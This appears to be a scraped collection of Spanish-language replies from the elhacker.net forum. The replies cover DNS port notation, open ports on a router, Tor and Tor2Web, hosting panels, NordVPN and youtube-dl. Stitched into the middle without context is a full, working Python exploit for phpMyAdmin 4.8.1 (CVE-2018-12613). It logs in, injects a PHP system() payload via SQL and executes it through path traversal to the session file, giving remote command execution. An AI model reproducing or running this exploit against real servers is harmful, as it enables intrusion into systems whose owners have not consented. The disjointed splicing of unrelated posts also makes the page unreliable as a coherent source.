Mensajes

Server:         200.25.144.1
Address:        200.25.144.1#53 <------ EL # ??

Es el puerto en este caso.

Normalmente cuando es una dirección web se ponen dos puntos:

http://www.elhacker.net:80
https://www.elhacker.net:443

Pero en servicios tipo DNS se usa la almohadilla #

Hoy me he animado y funciona correctamente:

- He formateado el ordenador por si era un tema de virus.

Si tuvieras un virus (malware, RAT), no abriría ningún puerto y menos el 23.

En el router (ZTE F6640) no supe como mirar los puertos abiertos.

Busca por NAT o PortForwarding.

- Descargue una app llamada Fing donde me aparecen abiertos los puertos: 23, 53, 80 y 443

La app fing no debería encontrar ningún puerto abierto en tu ip pública. ALgo falla aquí. Seguro que el router no deja expuestos esos puertos en la WAN (internet)

- He pasado el "Inspector de Red" una opción del ESET Internet Security por dos ordenadores distintos y me da el mismo error (Me llama la atencion que cuando realizo ese escaneo el antivirus llama a mi red E402_2 en lugar de E402)

¿estás usando Windows 10? Trae un firewall por defecto activo y ninguno de los puertos (servicios) que comentas abiertos.

¿Te refieres red Wifi E402_2?

- He mirado también en otros foros para ver alternativas, otras soluciones...

Bien hecho jejeje, es lo mejor que puedes hacer. Simplemente que lo busqué en google y al ver la misma pregunta pues me hizo gracia 

Por visitar un enlace en principio no pasa nada. Máximo robar las cookies de un sitio mal configurado y no es nada habitual.

Recuerda que si navegas por Tor o no, hacerlo siempre vía https. Ya han habido muchos casos de robos de billeteras de criptomonedas por usar http en vez de https, aunque sea vía Tor.

Lo más fácil es bajar el navegador web Tor y navegar por la deep web sin problemas, no usar servicios de terceros como Tor2Web, sólo debe ser usado como una alternativa bajo x circunstancias (por ejemplo, que no puedas instalar navegador)

Plesk es un panel de control para administrar un hosting contratado, igual que Cpanel de pago.

Webmin (VirtualMin), ISPConfig, VestaCP son gratuitos

colocara un link en el navegador y que aceptara las condiciones,

¿Y qué link era? ¿Y qué condiciones eran? ¿Avisos del navegador o instalar alguna extensión o complemento del navegador?

No sé porque alguien usa Tor2web, pudiendo bajar el navegador TOR normal.

Código (php) [Seleccionar] Expandir

# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
# Date: 17/08/2021
# Exploit Author: samguy
# Vulnerability Discovery By: ChaMd5 & Henry Huang
# Vendor Homepage: http://www.phpmyadmin.net
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
# Version: 4.8.1
# Tested on: Linux - Debian Buster (PHP 7.3)
# CVE : CVE-2018-12613

#!/usr/bin/env python

import re, requests, sys

# check python major version
if sys.version_info.major == 3:
  import html
else:
  from six.moves.html_parser import HTMLParser
  html = HTMLParser()

if len(sys.argv) < 7:
  usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
  print(usage.format(sys.argv[0],sys.argv[0]))
  exit()

def get_token(content):
  s = re.search('token"\s*value="(.*?)"', content)
  token = html.unescape(s.group(1))
  return token

ipaddr = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
command = sys.argv[6]

url = "http://{}:{}{}".format(ipaddr,port,path)

# 1st req: check login page and version
url1 = url + "/index.php"
r = requests.get(url1)
content = r.content.decode('utf-8')
if r.status_code != 200:
  print("Unable to find the version")
  exit()

s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
version = s.group(1)
if version != "4.8.0" and version != "4.8.1":
  print("The target is not exploitable".format(version))
  exit()

# get 1st token and cookie
cookies = r.cookies
token = get_token(content)

# 2nd req: login
p = {'token': token, 'pma_username': username, 'pma_password': password}
r = requests.post(url1, cookies = cookies, data = p)
content = r.content.decode('utf-8')
s = re.search('logged_in:(\w+),', content)
logged_in = s.group(1)
if logged_in == "false":
  print("Authentication failed")
  exit()

# get 2nd token and cookie
cookies = r.cookies
token = get_token(content)

# 3rd req: execute query
url2 = url + "/import.php"
# payload
payload = '''select '<?php system("{}") ?>';'''.format(command)
p = {'table':'', 'token': token, 'sql_query': payload }
r = requests.post(url2, cookies = cookies, data = p)
if r.status_code != 200:
  print("Query failed")
  exit()

# 4th req: execute payload
session_id = cookies.get_dict()['phpMyAdmin']
url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
r = requests.get(url3, cookies = cookies)
if r.status_code != 200:
  print("Exploit failed")
  exit()

# get result
content = r.content.decode('utf-8', errors="replace")
s = re.search("select '(.*?)\n'", content, re.DOTALL)
if s != None:
  print(s.group(1))
           

Me gustaría cambiar de linux mint a windows 7 y no me deja.

¿Cambiar te refieres a instalar Windows 7 y usar sólo Windows? ¿O poder usar los dos sistemas operativos con un gestor de arranque?

¿es NordVPN una VPN de pago? Creo que si, te pide un usuario y contraseña

Puedes guardar los datos en el gestor de contraseñas del navegador, por ejemplo.

NordVPN tiene muy buena documentación, seguro que está bien explicado.

[YouTube-DL]

Youtube-dl nació en un pueblo asturiano, motivado por una conexión vía módem de 56k en pleno 2006.

YouTube-DL sigue siendo una referencia, te permite bajar videos de todas partes, , Facebook, Twitter, Instagram o Vine

Tiene un montón de opciones para elegir formatos de vídeo, audio, subtítulos y demás,

https://ytdl-org.github.io/youtube-dl/download.html


Y hay youtube-dl-gui para Windows y Linux

https://github.com/MrS0m30n3/youtube-dl-gui



Incluso puedes pegar URLs de listas de reproducción completas de YouTube y el programa descarga todos los vídeos o audios en orden....